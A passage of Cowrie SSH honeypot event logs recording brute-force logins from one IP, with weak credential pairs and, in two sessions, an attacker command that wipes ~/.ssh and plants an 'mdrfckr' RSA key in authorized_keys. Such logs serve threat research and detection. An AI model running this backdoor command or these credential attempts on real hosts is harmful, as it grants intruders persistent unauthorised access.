cCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:55:34.357431Z","src_ip":"212.227.235.229","session":"0d01db48099a"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"123456","message":"login attempt [elasticsearch/123456] failed","sensor":"my-vps","timestamp":"2025-09-09T01:55:34.694905Z","src_ip":"212.227.235.229","session":"0d01db48099a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38018,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0ecf39ed03d","protocol":"ssh","message":"New connection: 212.227.235.229:38018 (1.2.3.4:22) [session: e0ecf39ed03d]","sensor":"my-vps","timestamp":"2025-09-09T01:55:35.088774Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:55:35.089538Z","src_ip":"212.227.235.229","session":"e0ecf39ed03d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:55:35.332179Z","src_ip":"212.227.235.229","session":"e0ecf39ed03d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45166,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0bdb19efac3","protocol":"ssh","message":"New connection: 212.227.235.229:45166 (1.2.3.4:22) [session: e0bdb19efac3]","sensor":"my-vps","timestamp":"2025-09-09T01:55:35.402619Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:55:35.403806Z","src_ip":"212.227.235.229","session":"e0bdb19efac3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:55:35.655946Z","src_ip":"212.227.235.229","session":"e0bdb19efac3"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:55:35.781351Z","src_ip":"212.227.235.229","session":"0d01db48099a"}
{"eventid":"cowrie.login.failed","username":"builder","password":"builder.123","message":"login attempt [builder/builder.123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:55:36.340457Z","src_ip":"212.227.235.229","session":"e0ecf39ed03d"}
{"eventid":"cowrie.login.failed","username":"bob","password":"bob","message":"login attempt [bob/bob] failed","sensor":"my-vps","timestamp":"2025-09-09T01:55:36.705827Z","src_ip":"212.227.235.229","session":"e0bdb19efac3"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:55:37.583742Z","src_ip":"212.227.235.229","session":"e0ecf39ed03d"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:55:37.959310Z","src_ip":"212.227.235.229","session":"e0bdb19efac3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51736,"dst_ip":"1.2.3.4","dst_port":22,"session":"d603c41bd645","protocol":"ssh","message":"New connection: 212.227.235.229:51736 (1.2.3.4:22) [session: d603c41bd645]","sensor":"my-vps","timestamp":"2025-09-09T01:55:47.770366Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:55:47.771735Z","src_ip":"212.227.235.229","session":"d603c41bd645"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:55:48.031827Z","src_ip":"212.227.235.229","session":"d603c41bd645"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44536,"dst_ip":"1.2.3.4","dst_port":22,"session":"4bf8f92c1e74","protocol":"ssh","message":"New connection: 212.227.235.229:44536 (1.2.3.4:22) [session: 4bf8f92c1e74]","sensor":"my-vps","timestamp":"2025-09-09T01:55:48.987532Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:55:48.988172Z","src_ip":"212.227.235.229","session":"4bf8f92c1e74"}
{"eventid":"cowrie.login.success","username":"root","password":"huawei@1","message":"login attempt [root/huawei@1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:55:49.115330Z","src_ip":"212.227.235.229","session":"d603c41bd645"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:55:49.249304Z","src_ip":"212.227.235.229","session":"4bf8f92c1e74"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:55:49.655908Z","src_ip":"212.227.235.229","session":"d603c41bd645"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:55:49.656920Z","src_ip":"212.227.235.229","session":"d603c41bd645"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:55:49.657833Z","src_ip":"212.227.235.229","session":"d603c41bd645"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:55:49.919295Z","src_ip":"212.227.235.229","session":"d603c41bd645"}
{"eventid":"cowrie.login.failed","username":"tests","password":"tests123","message":"login attempt [tests/tests123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:55:50.343115Z","src_ip":"212.227.235.229","session":"4bf8f92c1e74"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:55:50.533326Z","src_ip":"212.227.235.229","session":"d603c41bd645"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:55:50.534115Z","src_ip":"212.227.235.229","session":"d603c41bd645"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:55:50.796361Z","src_ip":"212.227.235.229","session":"d603c41bd645"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:55:50.797293Z","src_ip":"212.227.235.229","session":"d603c41bd645"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51748,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb3ab9d52650","protocol":"ssh","message":"New connection: 212.227.235.229:51748 (1.2.3.4:22) [session: fb3ab9d52650]","sensor":"my-vps","timestamp":"2025-09-09T01:55:51.053975Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:55:51.055050Z","src_ip":"212.227.235.229","session":"fb3ab9d52650"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:55:51.313389Z","src_ip":"212.227.235.229","session":"fb3ab9d52650"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:55:51.605706Z","src_ip":"212.227.235.229","session":"4bf8f92c1e74"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:55:52.387545Z","src_ip":"212.227.235.229","session":"fb3ab9d52650"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:55:53.649095Z","src_ip":"212.227.235.229","session":"fb3ab9d52650"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56394,"dst_ip":"1.2.3.4","dst_port":22,"session":"0222828a25b8","protocol":"ssh","message":"New connection: 212.227.235.229:56394 (1.2.3.4:22) [session: 0222828a25b8]","sensor":"my-vps","timestamp":"2025-09-09T01:55:53.907494Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:55:53.908441Z","src_ip":"212.227.235.229","session":"0222828a25b8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:55:54.167721Z","src_ip":"212.227.235.229","session":"0222828a25b8"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:55:55.247704Z","src_ip":"212.227.235.229","session":"0222828a25b8"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:55:55.507939Z","src_ip":"212.227.235.229","session":"d603c41bd645"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:55:55.508960Z","src_ip":"212.227.235.229","session":"0222828a25b8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51223,"dst_ip":"1.2.3.4","dst_port":22,"session":"823520770a7a","protocol":"ssh","message":"New connection: 212.227.235.229:51223 (1.2.3.4:22) [session: 823520770a7a]","sensor":"my-vps","timestamp":"2025-09-09T01:56:08.101908Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:56:08.103049Z","src_ip":"212.227.235.229","session":"823520770a7a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:56:08.335691Z","src_ip":"212.227.235.229","session":"823520770a7a"}
{"eventid":"cowrie.login.success","username":"root","password":"fabregas","message":"login attempt [root/fabregas] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:56:09.305493Z","src_ip":"212.227.235.229","session":"823520770a7a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:56:09.821706Z","src_ip":"212.227.235.229","session":"823520770a7a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:56:09.822381Z","src_ip":"212.227.235.229","session":"823520770a7a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:56:09.823265Z","src_ip":"212.227.235.229","session":"823520770a7a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:56:10.056716Z","src_ip":"212.227.235.229","session":"823520770a7a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:56:10.537117Z","src_ip":"212.227.235.229","session":"823520770a7a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:56:10.537775Z","src_ip":"212.227.235.229","session":"823520770a7a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:56:10.771511Z","src_ip":"212.227.235.229","session":"823520770a7a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:56:10.772365Z","src_ip":"212.227.235.229","session":"823520770a7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51781,"dst_ip":"1.2.3.4","dst_port":22,"session":"86d15877da49","protocol":"ssh","message":"New connection: 212.227.235.229:51781 (1.2.3.4:22) [session: 86d15877da49]","sensor":"my-vps","timestamp":"2025-09-09T01:56:11.005016Z"}
